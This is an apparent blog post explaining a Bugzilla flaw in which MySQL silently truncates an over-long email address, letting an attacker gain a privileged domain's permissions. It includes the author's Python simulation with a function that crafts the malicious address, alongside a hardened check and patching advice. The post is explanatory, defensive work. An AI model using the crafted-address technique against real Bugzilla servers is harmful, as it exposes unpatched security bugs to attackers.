PerimeterX discovered the vulnerability which “allows an attacker to obtain permissions on a Bugzilla service they would not otherwise receive. This is achieved by tricking the system into believing that the attacker is part of a privileged domain, causing the system to grant domain-specific permissions.”
But what does that mean? In plain terms: an attacker could register a Bugzilla account that the system treats as belonging to a privileged domain (for example a vendor's own domain), and with it read bug reports that are not public, including security bugs that have not been patched yet. I believe you agree when I say that that's not cool. A cybercriminal could use such information for their own gain, or turn the details of an unpatched bug into attacks on other people's computers.
“The Bugzilla authentication mechanism relies on email validation. Prior to the actual registration, the user enters their email address and the system sends an activation link to that address. This link contains a token which allows the user to register using that address and set their real name and their account password.
When the user registers with their email address, it is saved in the tokens DB table, along with the token required to activate the address. The email address is stored in a special column named eventdata.”
The trick is to submit an email address that is longer than 255 bytes. The eventdata column is a MySQL TINYTEXT, which holds at most 255 bytes, and when MySQL is not running in strict SQL mode it silently truncates the value on INSERT instead of rejecting it (with a strict sql_mode the INSERT would fail with a "Data too long" error). Bugzilla validates and mails the full address, but only the first 255 bytes end up in the table. That basically means that something like this:
will, once stored, become something like that:
“The resulting email will be sent to an address which we can read, however when the malicious email address is inserted into the DB it will be truncated, forcing the application to assume we identified an email under a different domain. This essentially performs a privilege-escalation attack, allowing us to obtain privileges we otherwise could not.”
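To make the mismatch between the validated address and the stored address concrete, here is a small simulation I added for this post; it is not code from PerimeterX, Mozilla or Bugzilla. The column width (255 bytes for TINYTEXT) is real; the privileged domain, the attacker's domain, the validation regex and the way the attacker receives the mail (a subdomain of a domain they control, so that the address still routes to them) are my assumptions for the illustration. The "fixed" flow is likewise an illustrative mitigation, not Mozilla's actual patch.

```python
import re

COLUMN_BYTES = 255                     # MySQL TINYTEXT stores at most 255 bytes
PRIVILEGED_DOMAIN = "mozilla.com"      # assumed: a domain Bugzilla maps to a privileged group
ATTACKER_DOMAIN = "attacker.example"   # constructed: a domain whose mail the attacker reads

# Assumed validation pattern in the spirit of Bugzilla's emailregexp setting
# (not Bugzilla's actual pattern): exactly one '@', a dotted domain, no whitespace.
EMAIL_RE = re.compile(r"^[^@\s]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def craft_address(privileged_domain=PRIVILEGED_DOMAIN,
                  attacker_domain=ATTACKER_DOMAIN,
                  column_bytes=COLUMN_BYTES):
    """Build an address that (a) passes validation, (b) is delivered to a host
    under attacker_domain, and (c) ends in '@' + privileged_domain once cut to
    column_bytes.  The padding is sized so the cut lands right after the
    privileged domain; the real suffix is a subdomain the attacker controls
    (assumed delivery mechanism, the page does not say how the mail was read)."""
    tail = "@" + privileged_domain
    padding = "a" * (column_bytes - len(tail))
    return padding + tail + "." + attacker_domain


def store_eventdata(address, column_bytes=COLUMN_BYTES):
    """Simulate MySQL with strict mode off: an over-long value is silently cut
    to the column width on INSERT instead of being rejected.  (With
    sql_mode=STRICT_TRANS_TABLES the INSERT fails with 'Data too long'.)"""
    return address.encode("utf-8")[:column_bytes].decode("utf-8", errors="ignore")


def mail_domain(address):
    """Domain part of an address, i.e. where mail for it is routed."""
    return address.rsplit("@", 1)[1]


def register_vulnerable(address):
    """Vulnerable flow: validate and mail the full address, store the truncated
    one, then trust the stored domain for group membership.
    Returns (domain the token mail went to, domain the account is credited with)."""
    if not EMAIL_RE.match(address):
        raise ValueError("invalid email address")
    delivered_to = mail_domain(address)      # the activation link goes here
    stored = store_eventdata(address)        # what the tokens table keeps
    credited_to = mail_domain(stored)        # what group logic later sees
    return delivered_to, credited_to


def register_fixed(address):
    """Illustrative hardening (not Mozilla's patch): refuse anything the column
    cannot hold verbatim, so the stored and the mailed address always agree."""
    if not EMAIL_RE.match(address):
        raise ValueError("invalid email address")
    if len(address.encode("utf-8")) > COLUMN_BYTES:
        raise ValueError("email address too long to store without truncation")
    stored = store_eventdata(address)
    return mail_domain(address), mail_domain(stored)


if __name__ == "__main__":
    evil = craft_address()
    print(len(evil), "bytes:", evil[:8] + "..." + evil[-40:])
    print("vulnerable flow credits:", register_vulnerable(evil))
    try:
        register_fixed(evil)
    except ValueError as exc:
        print("fixed flow:", exc)
```

Running it shows the vulnerable flow mailing the token to a host under attacker.example while crediting the account to mozilla.com; the hardened flow rejects the address outright. The same check belongs wherever a value is validated in one place and persisted in another with a narrower type, and turning on strict SQL mode makes the database refuse the over-long row instead of quietly rewriting it.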
Mozilla has already released a patch for the vulnerability, so if you run your own Bugzilla, update it as soon as possible!